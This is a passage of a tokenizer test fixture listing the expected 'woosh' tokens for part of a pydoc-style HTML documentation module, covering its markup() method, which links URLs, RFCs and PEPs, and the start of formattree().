woosh.Token(woosh.OP, '}', 673, 59, 673, 60),
woosh.Token(woosh.OP, ',', 673, 60, 673, 61),
woosh.Token(woosh.NAME, 'methods', 673, 62, 673, 69),
woosh.Token(woosh.OP, '=', 673, 69, 673, 70),
woosh.Token(woosh.OP, '{', 673, 70, 673, 71),
woosh.Token(woosh.OP, '}', 673, 71, 673, 72),
woosh.Token(woosh.OP, ')', 673, 72, 673, 73),
woosh.Token(woosh.OP, ':', 673, 73, 673, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 673, 74, 674, 0),
woosh.Token(woosh.INDENT, ' ', 674, 0, 674, 8),
woosh.Token(woosh.STRING, '"""Mark up some plain text, given a context of symbols to look for.\r\n Each context dictionary maps object names to anchor names."""', 674, 8, 675, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 675, 69, 676, 0),
woosh.Token(woosh.NAME, 'escape', 676, 8, 676, 14),
woosh.Token(woosh.OP, '=', 676, 15, 676, 16),
woosh.Token(woosh.NAME, 'escape', 676, 17, 676, 23),
woosh.Token(woosh.NAME, 'or', 676, 24, 676, 26),
woosh.Token(woosh.NAME, 'self', 676, 27, 676, 31),
woosh.Token(woosh.OP, '.', 676, 31, 676, 32),
woosh.Token(woosh.NAME, 'escape', 676, 32, 676, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 676, 38, 677, 0),
woosh.Token(woosh.NAME, 'results', 677, 8, 677, 15),
woosh.Token(woosh.OP, '=', 677, 16, 677, 17),
woosh.Token(woosh.OP, '[', 677, 18, 677, 19),
woosh.Token(woosh.OP, ']', 677, 19, 677, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 677, 20, 678, 0),
woosh.Token(woosh.NAME, 'here', 678, 8, 678, 12),
woosh.Token(woosh.OP, '=', 678, 13, 678, 14),
woosh.Token(woosh.NUMBER, '0', 678, 15, 678, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 678, 16, 679, 0),
woosh.Token(woosh.NAME, 'pattern', 679, 8, 679, 15),
woosh.Token(woosh.OP, '=', 679, 16, 679, 17),
woosh.Token(woosh.NAME, 're', 679, 18, 679, 20),
woosh.Token(woosh.OP, '.', 679, 20, 679, 21),
woosh.Token(woosh.NAME, 'compile', 679, 21, 679, 28),
woosh.Token(woosh.OP, '(', 679, 28, 679, 29),
woosh.Token(woosh.STRING, "r'\\b((http|https|ftp)://\\S+[\\w/]|'", 679, 29, 679, 63),
woosh.Token(woosh.STRING, "r'RFC[- ]?(\\d+)|'", 680, 32, 680, 49),
woosh.Token(woosh.STRING, "r'PEP[- ]?(\\d+)|'", 681, 32, 681, 49),
woosh.Token(woosh.STRING, "r'(self\\.)?(\\w+))'", 682, 32, 682, 50),
woosh.Token(woosh.OP, ')', 682, 50, 682, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 682, 51, 683, 0),
woosh.Token(woosh.NAME, 'while', 683, 8, 683, 13),
woosh.Token(woosh.NAME, 'True', 683, 14, 683, 18),
woosh.Token(woosh.OP, ':', 683, 18, 683, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 683, 19, 684, 0),
woosh.Token(woosh.INDENT, ' ', 684, 0, 684, 12),
woosh.Token(woosh.NAME, 'match', 684, 12, 684, 17),
woosh.Token(woosh.OP, '=', 684, 18, 684, 19),
woosh.Token(woosh.NAME, 'pattern', 684, 20, 684, 27),
woosh.Token(woosh.OP, '.', 684, 27, 684, 28),
woosh.Token(woosh.NAME, 'search', 684, 28, 684, 34),
woosh.Token(woosh.OP, '(', 684, 34, 684, 35),
woosh.Token(woosh.NAME, 'text', 684, 35, 684, 39),
woosh.Token(woosh.OP, ',', 684, 39, 684, 40),
woosh.Token(woosh.NAME, 'here', 684, 41, 684, 45),
woosh.Token(woosh.OP, ')', 684, 45, 684, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 684, 46, 685, 0),
woosh.Token(woosh.NAME, 'if', 685, 12, 685, 14),
woosh.Token(woosh.NAME, 'not', 685, 15, 685, 18),
woosh.Token(woosh.NAME, 'match', 685, 19, 685, 24),
woosh.Token(woosh.OP, ':', 685, 24, 685, 25),
woosh.Token(woosh.NAME, 'break', 685, 26, 685, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 685, 31, 686, 0),
woosh.Token(woosh.NAME, 'start', 686, 12, 686, 17),
woosh.Token(woosh.OP, ',', 686, 17, 686, 18),
woosh.Token(woosh.NAME, 'end', 686, 19, 686, 22),
woosh.Token(woosh.OP, '=', 686, 23, 686, 24),
woosh.Token(woosh.NAME, 'match', 686, 25, 686, 30),
woosh.Token(woosh.OP, '.', 686, 30, 686, 31),
woosh.Token(woosh.NAME, 'span', 686, 31, 686, 35),
woosh.Token(woosh.OP, '(', 686, 35, 686, 36),
woosh.Token(woosh.OP, ')', 686, 36, 686, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 686, 37, 687, 0),
woosh.Token(woosh.NAME, 'results', 687, 12, 687, 19),
woosh.Token(woosh.OP, '.', 687, 19, 687, 20),
woosh.Token(woosh.NAME, 'append', 687, 20, 687, 26),
woosh.Token(woosh.OP, '(', 687, 26, 687, 27),
woosh.Token(woosh.NAME, 'escape', 687, 27, 687, 33),
woosh.Token(woosh.OP, '(', 687, 33, 687, 34),
woosh.Token(woosh.NAME, 'text', 687, 34, 687, 38),
woosh.Token(woosh.OP, '[', 687, 38, 687, 39),
woosh.Token(woosh.NAME, 'here', 687, 39, 687, 43),
woosh.Token(woosh.OP, ':', 687, 43, 687, 44),
woosh.Token(woosh.NAME, 'start', 687, 44, 687, 49),
woosh.Token(woosh.OP, ']', 687, 49, 687, 50),
woosh.Token(woosh.OP, ')', 687, 50, 687, 51),
woosh.Token(woosh.OP, ')', 687, 51, 687, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 687, 52, 688, 0),
woosh.Token(woosh.NAME, 'all', 689, 12, 689, 15),
woosh.Token(woosh.OP, ',', 689, 15, 689, 16),
woosh.Token(woosh.NAME, 'scheme', 689, 17, 689, 23),
woosh.Token(woosh.OP, ',', 689, 23, 689, 24),
woosh.Token(woosh.NAME, 'rfc', 689, 25, 689, 28),
woosh.Token(woosh.OP, ',', 689, 28, 689, 29),
woosh.Token(woosh.NAME, 'pep', 689, 30, 689, 33),
woosh.Token(woosh.OP, ',', 689, 33, 689, 34),
woosh.Token(woosh.NAME, 'selfdot', 689, 35, 689, 42),
woosh.Token(woosh.OP, ',', 689, 42, 689, 43),
woosh.Token(woosh.NAME, 'name', 689, 44, 689, 48),
woosh.Token(woosh.OP, '=', 689, 49, 689, 50),
woosh.Token(woosh.NAME, 'match', 689, 51, 689, 56),
woosh.Token(woosh.OP, '.', 689, 56, 689, 57),
woosh.Token(woosh.NAME, 'groups', 689, 57, 689, 63),
woosh.Token(woosh.OP, '(', 689, 63, 689, 64),
woosh.Token(woosh.OP, ')', 689, 64, 689, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 689, 65, 690, 0),
woosh.Token(woosh.NAME, 'if', 690, 12, 690, 14),
woosh.Token(woosh.NAME, 'scheme', 690, 15, 690, 21),
woosh.Token(woosh.OP, ':', 690, 21, 690, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 690, 22, 691, 0),
woosh.Token(woosh.INDENT, ' ', 691, 0, 691, 16),
woosh.Token(woosh.NAME, 'url', 691, 16, 691, 19),
woosh.Token(woosh.OP, '=', 691, 20, 691, 21),
woosh.Token(woosh.NAME, 'escape', 691, 22, 691, 28),
woosh.Token(woosh.OP, '(', 691, 28, 691, 29),
woosh.Token(woosh.NAME, 'all', 691, 29, 691, 32),
woosh.Token(woosh.OP, ')', 691, 32, 691, 33),
woosh.Token(woosh.OP, '.', 691, 33, 691, 34),
woosh.Token(woosh.NAME, 'replace', 691, 34, 691, 41),
woosh.Token(woosh.OP, '(', 691, 41, 691, 42),
woosh.Token(woosh.STRING, '\'"\'', 691, 42, 691, 45),
woosh.Token(woosh.OP, ',', 691, 45, 691, 46),
woosh.Token(woosh.STRING, "'"'", 691, 47, 691, 55),
woosh.Token(woosh.OP, ')', 691, 55, 691, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 691, 56, 692, 0),
woosh.Token(woosh.NAME, 'results', 692, 16, 692, 23),
woosh.Token(woosh.OP, '.', 692, 23, 692, 24),
woosh.Token(woosh.NAME, 'append', 692, 24, 692, 30),
woosh.Token(woosh.OP, '(', 692, 30, 692, 31),
woosh.Token(woosh.STRING, '\'<a href="%s">%s</a>\'', 692, 31, 692, 52),
woosh.Token(woosh.OP, '%', 692, 53, 692, 54),
woosh.Token(woosh.OP, '(', 692, 55, 692, 56),
woosh.Token(woosh.NAME, 'url', 692, 56, 692, 59),
woosh.Token(woosh.OP, ',', 692, 59, 692, 60),
woosh.Token(woosh.NAME, 'url', 692, 61, 692, 64),
woosh.Token(woosh.OP, ')', 692, 64, 692, 65),
woosh.Token(woosh.OP, ')', 692, 65, 692, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 692, 66, 693, 0),
woosh.Token(woosh.DEDENT, ' ', 693, 0, 693, 12),
woosh.Token(woosh.NAME, 'elif', 693, 12, 693, 16),
woosh.Token(woosh.NAME, 'rfc', 693, 17, 693, 20),
woosh.Token(woosh.OP, ':', 693, 20, 693, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 693, 21, 694, 0),
woosh.Token(woosh.INDENT, ' ', 694, 0, 694, 16),
woosh.Token(woosh.NAME, 'url', 694, 16, 694, 19),
woosh.Token(woosh.OP, '=', 694, 20, 694, 21),
woosh.Token(woosh.STRING, "'http://www.rfc-editor.org/rfc/rfc%d.txt'", 694, 22, 694, 63),
woosh.Token(woosh.OP, '%', 694, 64, 694, 65),
woosh.Token(woosh.NAME, 'int', 694, 66, 694, 69),
woosh.Token(woosh.OP, '(', 694, 69, 694, 70),
woosh.Token(woosh.NAME, 'rfc', 694, 70, 694, 73),
woosh.Token(woosh.OP, ')', 694, 73, 694, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 694, 74, 695, 0),
woosh.Token(woosh.NAME, 'results', 695, 16, 695, 23),
woosh.Token(woosh.OP, '.', 695, 23, 695, 24),
woosh.Token(woosh.NAME, 'append', 695, 24, 695, 30),
woosh.Token(woosh.OP, '(', 695, 30, 695, 31),
woosh.Token(woosh.STRING, '\'<a href="%s">%s</a>\'', 695, 31, 695, 52),
woosh.Token(woosh.OP, '%', 695, 53, 695, 54),
woosh.Token(woosh.OP, '(', 695, 55, 695, 56),
woosh.Token(woosh.NAME, 'url', 695, 56, 695, 59),
woosh.Token(woosh.OP, ',', 695, 59, 695, 60),
woosh.Token(woosh.NAME, 'escape', 695, 61, 695, 67),
woosh.Token(woosh.OP, '(', 695, 67, 695, 68),
woosh.Token(woosh.NAME, 'all', 695, 68, 695, 71),
woosh.Token(woosh.OP, ')', 695, 71, 695, 72),
woosh.Token(woosh.OP, ')', 695, 72, 695, 73),
woosh.Token(woosh.OP, ')', 695, 73, 695, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 695, 74, 696, 0),
woosh.Token(woosh.DEDENT, ' ', 696, 0, 696, 12),
woosh.Token(woosh.NAME, 'elif', 696, 12, 696, 16),
woosh.Token(woosh.NAME, 'pep', 696, 17, 696, 20),
woosh.Token(woosh.OP, ':', 696, 20, 696, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 696, 21, 697, 0),
woosh.Token(woosh.INDENT, ' ', 697, 0, 697, 16),
woosh.Token(woosh.NAME, 'url', 697, 16, 697, 19),
woosh.Token(woosh.OP, '=', 697, 20, 697, 21),
woosh.Token(woosh.STRING, "'http://www.python.org/dev/peps/pep-%04d/'", 697, 22, 697, 64),
woosh.Token(woosh.OP, '%', 697, 65, 697, 66),
woosh.Token(woosh.NAME, 'int', 697, 67, 697, 70),
woosh.Token(woosh.OP, '(', 697, 70, 697, 71),
woosh.Token(woosh.NAME, 'pep', 697, 71, 697, 74),
woosh.Token(woosh.OP, ')', 697, 74, 697, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 697, 75, 698, 0),
woosh.Token(woosh.NAME, 'results', 698, 16, 698, 23),
woosh.Token(woosh.OP, '.', 698, 23, 698, 24),
woosh.Token(woosh.NAME, 'append', 698, 24, 698, 30),
woosh.Token(woosh.OP, '(', 698, 30, 698, 31),
woosh.Token(woosh.STRING, '\'<a href="%s">%s</a>\'', 698, 31, 698, 52),
woosh.Token(woosh.OP, '%', 698, 53, 698, 54),
woosh.Token(woosh.OP, '(', 698, 55, 698, 56),
woosh.Token(woosh.NAME, 'url', 698, 56, 698, 59),
woosh.Token(woosh.OP, ',', 698, 59, 698, 60),
woosh.Token(woosh.NAME, 'escape', 698, 61, 698, 67),
woosh.Token(woosh.OP, '(', 698, 67, 698, 68),
woosh.Token(woosh.NAME, 'all', 698, 68, 698, 71),
woosh.Token(woosh.OP, ')', 698, 71, 698, 72),
woosh.Token(woosh.OP, ')', 698, 72, 698, 73),
woosh.Token(woosh.OP, ')', 698, 73, 698, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 698, 74, 699, 0),
woosh.Token(woosh.DEDENT, ' ', 699, 0, 699, 12),
woosh.Token(woosh.NAME, 'elif', 699, 12, 699, 16),
woosh.Token(woosh.NAME, 'selfdot', 699, 17, 699, 24),
woosh.Token(woosh.OP, ':', 699, 24, 699, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 699, 25, 700, 0),
woosh.Token(woosh.COMMENT, "# Create a link for methods like 'self.method(...)'", 700, 16, 700, 67),
woosh.Token(woosh.COMMENT, "# and use <strong> for attributes like 'self.attr'", 701, 16, 701, 66),
woosh.Token(woosh.INDENT, ' ', 702, 0, 702, 16),
woosh.Token(woosh.NAME, 'if', 702, 16, 702, 18),
woosh.Token(woosh.NAME, 'text', 702, 19, 702, 23),
woosh.Token(woosh.OP, '[', 702, 23, 702, 24),
woosh.Token(woosh.NAME, 'end', 702, 24, 702, 27),
woosh.Token(woosh.OP, ':', 702, 27, 702, 28),
woosh.Token(woosh.NAME, 'end', 702, 28, 702, 31),
woosh.Token(woosh.OP, '+', 702, 31, 702, 32),
woosh.Token(woosh.NUMBER, '1', 702, 32, 702, 33),
woosh.Token(woosh.OP, ']', 702, 33, 702, 34),
woosh.Token(woosh.OP, '==', 702, 35, 702, 37),
woosh.Token(woosh.STRING, "'('", 702, 38, 702, 41),
woosh.Token(woosh.OP, ':', 702, 41, 702, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 702, 42, 703, 0),
woosh.Token(woosh.INDENT, ' ', 703, 0, 703, 20),
woosh.Token(woosh.NAME, 'results', 703, 20, 703, 27),
woosh.Token(woosh.OP, '.', 703, 27, 703, 28),
woosh.Token(woosh.NAME, 'append', 703, 28, 703, 34),
woosh.Token(woosh.OP, '(', 703, 34, 703, 35),
woosh.Token(woosh.STRING, "'self.'", 703, 35, 703, 42),
woosh.Token(woosh.OP, '+', 703, 43, 703, 44),
woosh.Token(woosh.NAME, 'self', 703, 45, 703, 49),
woosh.Token(woosh.OP, '.', 703, 49, 703, 50),
woosh.Token(woosh.NAME, 'namelink', 703, 50, 703, 58),
woosh.Token(woosh.OP, '(', 703, 58, 703, 59),
woosh.Token(woosh.NAME, 'name', 703, 59, 703, 63),
woosh.Token(woosh.OP, ',', 703, 63, 703, 64),
woosh.Token(woosh.NAME, 'methods', 703, 65, 703, 72),
woosh.Token(woosh.OP, ')', 703, 72, 703, 73),
woosh.Token(woosh.OP, ')', 703, 73, 703, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 703, 74, 704, 0),
woosh.Token(woosh.DEDENT, ' ', 704, 0, 704, 16),
woosh.Token(woosh.NAME, 'else', 704, 16, 704, 20),
woosh.Token(woosh.OP, ':', 704, 20, 704, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 704, 21, 705, 0),
woosh.Token(woosh.INDENT, ' ', 705, 0, 705, 20),
woosh.Token(woosh.NAME, 'results', 705, 20, 705, 27),
woosh.Token(woosh.OP, '.', 705, 27, 705, 28),
woosh.Token(woosh.NAME, 'append', 705, 28, 705, 34),
woosh.Token(woosh.OP, '(', 705, 34, 705, 35),
woosh.Token(woosh.STRING, "'self.<strong>%s</strong>'", 705, 35, 705, 61),
woosh.Token(woosh.OP, '%', 705, 62, 705, 63),
woosh.Token(woosh.NAME, 'name', 705, 64, 705, 68),
woosh.Token(woosh.OP, ')', 705, 68, 705, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 705, 69, 706, 0),
woosh.Token(woosh.DEDENT, ' ', 706, 0, 706, 12),
woosh.Token(woosh.DEDENT, '', 706, 12, 706, 12),
woosh.Token(woosh.NAME, 'elif', 706, 12, 706, 16),
woosh.Token(woosh.NAME, 'text', 706, 17, 706, 21),
woosh.Token(woosh.OP, '[', 706, 21, 706, 22),
woosh.Token(woosh.NAME, 'end', 706, 22, 706, 25),
woosh.Token(woosh.OP, ':', 706, 25, 706, 26),
woosh.Token(woosh.NAME, 'end', 706, 26, 706, 29),
woosh.Token(woosh.OP, '+', 706, 29, 706, 30),
woosh.Token(woosh.NUMBER, '1', 706, 30, 706, 31),
woosh.Token(woosh.OP, ']', 706, 31, 706, 32),
woosh.Token(woosh.OP, '==', 706, 33, 706, 35),
woosh.Token(woosh.STRING, "'('", 706, 36, 706, 39),
woosh.Token(woosh.OP, ':', 706, 39, 706, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 706, 40, 707, 0),
woosh.Token(woosh.INDENT, ' ', 707, 0, 707, 16),
woosh.Token(woosh.NAME, 'results', 707, 16, 707, 23),
woosh.Token(woosh.OP, '.', 707, 23, 707, 24),
woosh.Token(woosh.NAME, 'append', 707, 24, 707, 30),
woosh.Token(woosh.OP, '(', 707, 30, 707, 31),
woosh.Token(woosh.NAME, 'self', 707, 31, 707, 35),
woosh.Token(woosh.OP, '.', 707, 35, 707, 36),
woosh.Token(woosh.NAME, 'namelink', 707, 36, 707, 44),
woosh.Token(woosh.OP, '(', 707, 44, 707, 45),
woosh.Token(woosh.NAME, 'name', 707, 45, 707, 49),
woosh.Token(woosh.OP, ',', 707, 49, 707, 50),
woosh.Token(woosh.NAME, 'methods', 707, 51, 707, 58),
woosh.Token(woosh.OP, ',', 707, 58, 707, 59),
woosh.Token(woosh.NAME, 'funcs', 707, 60, 707, 65),
woosh.Token(woosh.OP, ',', 707, 65, 707, 66),
woosh.Token(woosh.NAME, 'classes', 707, 67, 707, 74),
woosh.Token(woosh.OP, ')', 707, 74, 707, 75),
woosh.Token(woosh.OP, ')', 707, 75, 707, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 707, 76, 708, 0),
woosh.Token(woosh.DEDENT, ' ', 708, 0, 708, 12),
woosh.Token(woosh.NAME, 'else', 708, 12, 708, 16),
woosh.Token(woosh.OP, ':', 708, 16, 708, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 708, 17, 709, 0),
woosh.Token(woosh.INDENT, ' ', 709, 0, 709, 16),
woosh.Token(woosh.NAME, 'results', 709, 16, 709, 23),
woosh.Token(woosh.OP, '.', 709, 23, 709, 24),
woosh.Token(woosh.NAME, 'append', 709, 24, 709, 30),
woosh.Token(woosh.OP, '(', 709, 30, 709, 31),
woosh.Token(woosh.NAME, 'self', 709, 31, 709, 35),
woosh.Token(woosh.OP, '.', 709, 35, 709, 36),
woosh.Token(woosh.NAME, 'namelink', 709, 36, 709, 44),
woosh.Token(woosh.OP, '(', 709, 44, 709, 45),
woosh.Token(woosh.NAME, 'name', 709, 45, 709, 49),
woosh.Token(woosh.OP, ',', 709, 49, 709, 50),
woosh.Token(woosh.NAME, 'classes', 709, 51, 709, 58),
woosh.Token(woosh.OP, ')', 709, 58, 709, 59),
woosh.Token(woosh.OP, ')', 709, 59, 709, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 709, 60, 710, 0),
woosh.Token(woosh.DEDENT, ' ', 710, 0, 710, 12),
woosh.Token(woosh.NAME, 'here', 710, 12, 710, 16),
woosh.Token(woosh.OP, '=', 710, 17, 710, 18),
woosh.Token(woosh.NAME, 'end', 710, 19, 710, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 710, 22, 711, 0),
woosh.Token(woosh.DEDENT, ' ', 711, 0, 711, 8),
woosh.Token(woosh.NAME, 'results', 711, 8, 711, 15),
woosh.Token(woosh.OP, '.', 711, 15, 711, 16),
woosh.Token(woosh.NAME, 'append', 711, 16, 711, 22),
woosh.Token(woosh.OP, '(', 711, 22, 711, 23),
woosh.Token(woosh.NAME, 'escape', 711, 23, 711, 29),
woosh.Token(woosh.OP, '(', 711, 29, 711, 30),
woosh.Token(woosh.NAME, 'text', 711, 30, 711, 34),
woosh.Token(woosh.OP, '[', 711, 34, 711, 35),
woosh.Token(woosh.NAME, 'here', 711, 35, 711, 39),
woosh.Token(woosh.OP, ':', 711, 39, 711, 40),
woosh.Token(woosh.OP, ']', 711, 40, 711, 41),
woosh.Token(woosh.OP, ')', 711, 41, 711, 42),
woosh.Token(woosh.OP, ')', 711, 42, 711, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 711, 43, 712, 0),
woosh.Token(woosh.NAME, 'return', 712, 8, 712, 14),
woosh.Token(woosh.STRING, "''", 712, 15, 712, 17),
woosh.Token(woosh.OP, '.', 712, 17, 712, 18),
woosh.Token(woosh.NAME, 'join', 712, 18, 712, 22),
woosh.Token(woosh.OP, '(', 712, 22, 712, 23),
woosh.Token(woosh.NAME, 'results', 712, 23, 712, 30),
woosh.Token(woosh.OP, ')', 712, 30, 712, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 712, 31, 713, 0),
woosh.Token(woosh.COMMENT, '# ---------------------------------------------- type-specific routines', 714, 4, 714, 75),
woosh.Token(woosh.DEDENT, ' ', 716, 0, 716, 4),
woosh.Token(woosh.NAME, 'def', 716, 4, 716, 7),
woosh.Token(woosh.NAME, 'formattree', 716, 8, 716, 18),
woosh.Token(woosh.OP, '(', 716, 18, 716, 19),
woosh.Token(woosh.NAME, 'self', 716, 19, 716, 23),
woosh.Token(woosh.OP, ',', 716, 23, 716, 24),
woosh.Token(woosh.NAME, 'tree', 716, 25, 716, 29),
woosh.Token(woosh.OP, ',', 716, 29, 716, 30),
woosh.Token(woosh.NAME, 'modname', 716, 31, 716, 38),
woosh.Token(woosh.OP, ',', 716, 38, 716, 39),
woosh.Token(woosh.NAME, 'parent', 716, 40, 716, 46),
woosh.Token(woosh.OP, '=', 716, 46, 716, 47),
woosh.Token(woosh.NAME, 'None', 716, 47, 716, 51),
woosh.Token(woosh.OP, ')', 716, 51, 716, 52),
woosh.Token(woosh.OP, ':', 716, 52, 716, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 716, 53, 717, 0),
woosh.Token(woosh.INDENT, ' ', 717, 0, 717, 8),
woosh.Token(woosh.STRING, '"""Produce HTML for a class tree as given by inspect.getclasstree()."""', 717, 8, 717, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 717, 79, 718, 0),
woosh.Token(woosh.NAME, 'result', 718, 8, 718, 14),
woosh.Token(woosh.OP, '=', 718, 15, 718, 16),
woosh.Token(woosh.STRING, "''", 718, 17, 718, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 718, 19, 719, 0),
woosh.Token(woosh.NAME, 'for', 719, 8, 719, 11),
woosh.Token(woosh.NAME, 'entry', 719, 12, 719, 17),
woosh.Token(woosh.NAME, 'in', 719, 18, 719, 20),
woosh.Token(woosh.NAME, 'tree', 719, 21, 719, 25),
woosh.Token(woosh.OP, ':', 719, 25, 719, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 719, 26, 720, 0),
woosh.Token(woosh.INDENT, ' ', 720, 0, 720, 12),
woosh.Token(woosh.NAME, 'if', 720, 12, 720, 14),
woosh.Token(woosh.NAME, 'type', 720, 15, 720, 19),
woosh.Token(woosh.OP, '(', 720, 19, 720, 20),
woosh.Token(woosh.NAME, 'entry', 720, 20, 720, 25),
woosh.Token(woosh.OP, ')', 720, 25, 720, 26),
woosh.Token(woosh.NAME, 'is', 720, 27, 720, 29),
woosh.Token(woosh.NAME, 'type', 720, 30, 720, 34),
woosh.Token(woosh.OP, '(', 720, 34, 720, 35),
woosh.Token(woosh.OP, '(', 720, 35, 720, 36),
woosh.Token(woosh.OP, ')', 720, 36, 720, 37),
woosh.Token(woosh.OP, ')', 720, 37, 720, 38),
woosh.Token(woosh.OP, ':', 720, 38, 720, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 720, 39, 721, 0),
woosh.Token(woosh.INDENT, ' ', 721, 0, 721, 16),
woosh.Token(woosh.NAME, 'c', 721, 16, 721, 17),
woosh.Token(woosh.OP, ',', 721, 17, 721, 18),
woosh.Token(woosh.NAME, 'bases', 721, 19, 721, 24),
woosh.Token(woosh.OP, '=', 721, 25, 721, 26),
woosh.Token(woosh.NAME, 'entry', 721, 27, 721, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 721, 32, 722, 0),
woosh.Token(woosh.NAME, 'result', 722, 16, 722, 22),
woosh.Token(woosh.OP, '=', 722, 23, 722, 24),
woosh.Token(woosh.NAME, 'result', 722, 25, 722, 31),
woosh.Token(woosh.OP, '+', 722, 32, 722, 33),
woosh.Token(woosh.STRING, '\'<dt><font face="helvetica, arial">\'', 722, 34, 722, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 722, 70, 723, 0),
woosh.Token(woosh.NAME, 'result', 723, 16, 723, 22),
woosh.Token(woosh.OP, '=', 723, 23, 723, 24),
woosh.Token(woosh.NAME, 'result', 723, 25, 723, 31),
woosh.Token(woosh.OP, '+', 723, 32, 723, 33),
woosh.Token(woosh.NAME, 'self', 723, 34, 723, 38),
woosh.Token(woosh.OP, '.', 723, 38, 723, 39),
woosh.Token(woosh.NAME, 'classlink', 723, 39, 723, 48),
woosh.Token(woosh.OP, '(', 723, 48, 723, 49),
woosh.Token(woosh.NAME, 'c', 723, 49, 723, 50),
woosh.Token(woosh.OP, ',', 723, 50, 723, 51),
woosh.Token(woosh.NAME, 'modname', 723, 52, 723, 59),
woosh.Token(woosh.OP, ')', 723, 59, 723, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 723, 60, 724, 0),
woosh.Token(woosh.NAME, 'if', 724, 16, 724, 18),
woosh.Token(woosh.NAME, 'bases', 724, 19, 724, 24),
woosh.Token(woosh.NAME, 'and', 724, 25, 724, 28),
woosh.Token(woosh.NAME, 'bases', 724, 29, 724, 34),
woosh.Token(woosh.OP, '!=', 724, 35, 724, 37),
woosh.Token(woosh.OP, '(', 724, 38, 724, 39),
woosh.Token(woosh.NAME, 'parent', 724, 39, 724, 45),
woosh.Token(woosh.OP, ',', 724, 45, 724, 46),
woosh.Token(woosh.OP, ')', 724, 46, 724, 47),
woosh.Token(woosh.OP, ':', 724, 47, 724, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 724, 48, 725, 0),
woosh.Token(woosh.INDENT, ' ', 725, 0, 725, 20),
woosh.Token(woosh.NAME, 'parents', 725, 20, 725, 27),
woosh.Token(woosh.OP, '=', 725, 28, 725, 29),
woosh.Token(woosh.OP, '[', 725, 30, 725, 31),
woosh.Token(woosh.OP, ']', 725, 31, 725, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 725, 32, 726, 0),
woosh.Token(woosh.NAME, 'for', 726, 20, 726, 23),
woosh.Token(woosh.NAME, 'base', 726, 24, 726, 28),
woosh.Token(woosh.NAME, 'in', 726, 29, 726, 31),
woosh.Token(woosh.NAME, 'bases', 726, 32, 726, 37),
woosh.Token(woosh.OP, ':', 726, 37, 726, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 726, 38, 727, 0),
woosh.Token(woosh.INDENT, ' ', 727, 0, 727, 24),
woosh.Token(woosh.NAME, 'parents', 727, 24, 727, 31),
woosh.Token(woosh.OP, '.', 727, 31, 727, 32),
woosh.Token(woosh.NAME, 'append', 727, 32, 727, 38),
woosh.Token(woosh.OP, '(', 727, 38, 727, 39),
woosh.Token(woosh.NAME, 'self', 727, 39, 727, 43),
woosh.Token(woosh.OP, '.', 727, 43, 727, 44),
woosh.Token(woosh.NAME, 'classlink', 727, 44, 727, 53),
woosh.Token(woosh.OP, '(', 727, 53, 727, 54),
woosh.Token(woosh.NAME, 'base', 727, 54, 727, 58),
woosh.Token(woosh.OP, ',', 727, 58, 727, 59),
woosh.Token(woosh.NAME, 'modname', 727, 60, 727, 67),
woosh.Token(woosh.OP, ')', 727, 67, 727, 68),
woosh.Token(woosh.OP, ')', 727, 68, 727, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 727, 69, 728, 0),
woosh.Token(woosh.DEDENT, ' ', 728, 0, 728, 20),
woosh.Token(woosh.NAME, 'result', 728, 20, 728, 26),
woosh.Token(woosh.OP, '=', 728, 27, 728, 28),
woosh.Token(woosh.NAME, 'result', 728, 29, 728, 35),
woosh.Token(woosh.OP, '+', 728, 36, 728, 37),
woosh.Token(woosh.STRING, "'('", 728, 38, 728, 41),
woosh.Token(woosh.OP, '+', 728, 42, 728, 43),
woosh.Token(woosh.STRING, "', '", 728, 44, 728, 48),
woosh.Token(woosh.OP, '.', 728, 48, 728, 49),
woosh.Token(woosh.NAME, 'join', 728, 49, 728, 53),
woosh.Token(woosh.OP, '(', 728, 53, 728, 54),
woosh.Token(woosh.NAME, 'parents', 728, 54, 728, 61),
woosh.Token(woosh.OP, ')', 728, 61, 728, 62),
woosh.Token(woosh.OP, '+', 728, 63, 728, 64),
woosh.Token(woosh.STRING, "')'", 728, 65, 728, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 728, 68, 729, 0),
woosh.Token(woosh.DEDENT, ' ', 729, 0, 729, 16),
woosh.Token(woosh.NAME, 'result', 729, 16, 729, 22),
woosh.Token(woosh.OP, '=', 729, 23, 729, 24),
